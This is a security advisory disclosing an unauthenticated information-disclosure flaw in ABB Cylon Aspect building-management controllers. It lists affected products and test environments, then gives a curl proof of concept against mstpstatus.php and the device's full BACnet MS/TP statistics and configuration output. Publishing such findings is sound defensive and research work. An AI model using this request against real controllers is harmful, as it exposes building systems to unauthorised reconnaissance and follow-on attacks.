ABB Cylon Aspect 3.08.01 (mstpstatus.php) Information Disclosure Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.01 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: The ABB BMS/BAS controller suffers from an unauthenticated information disclosure vulnerability. An unauthorized attacker can reference the affected page and disclose various BACnet MS/TP statistics running on the device. Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5865 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5865.php 21.04.2024 -- $ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl http://192.168.73.31/mstpstatus.php Thu Nov 28 10:13:51 UTC 2024
Port 0 Load: 123 Average time (ms) to wait for token return 47 Average time (ms) to wait for for a reply 20 Max info frames 1063 Estimated time for max_nfo_frmaes tx plus token cycle (ms) 18 Estimated max rate (trasactions per sec) 38 congestion threashold %
Port 0 BPS (Total):
Port 0 BPS (Mine):
Port 1 Load: 34 Average time (ms) to wait for token return 40 Average time (ms) to wait for for a reply 20 Max info frames 834 Estimated time for max_nfo_frmaes tx plus token cycle (ms) 23 Estimated max rate (trasactions per sec) 48 congestion threashold %
Port 1 BPS (Total):
Port 1 BPS (Mine):

$Id: mstp.ko R_03_05_01 Thu Sep 23 09:30:32 EDT 2021 $
Proto: 0

Port 0 Statistics =======================
Baud Rate: 38400
RX Characters: 60521
RX echoes: 0
RX Errors: 31
TX Characters: 49671
Echo detect fails: 0

Port 0 MSTP State =======================
ValidRXFrameCnt: 42320
InvdRXFrameCnt: 61
rxDataFrames: 16558
rxToken: 29242
TXFrameCnt: 2072
TXQueCnt: 1
CongestionCnt: 0
Poll_Station: 0
SoleMaster: FALSE

Port 0 config =======================
Nmax_master: 127
Nmax_info_frames: 20
This_Station: 0
Tno_token: 500
Tusage timeout 30
congestion (auto): 38
Npoll: 50


Port 1 Statistics =======================
Baud Rate: 38400
RX Characters: 0
RX echoes: 0
RX Errors: 0
TX Characters: 33632
Echo detect fails: 0

Port 1 MSTP State =======================
ValidRXFrameCnt: 0
InvdRXFrameCnt: 0
rxDataFrames: 0
rxToken: 0
TXFrameCnt: 2
TXQueCnt: 0
CongestionCnt: 0
Poll_Station: 29
SoleMaster: TRUE

Port 1 config =======================
Nmax_master: 127
Nmax_info_frames: 20
This_Station: 0
Tno_token: 500
Tusage timeout 30
congestion (auto): 48
Npoll: 50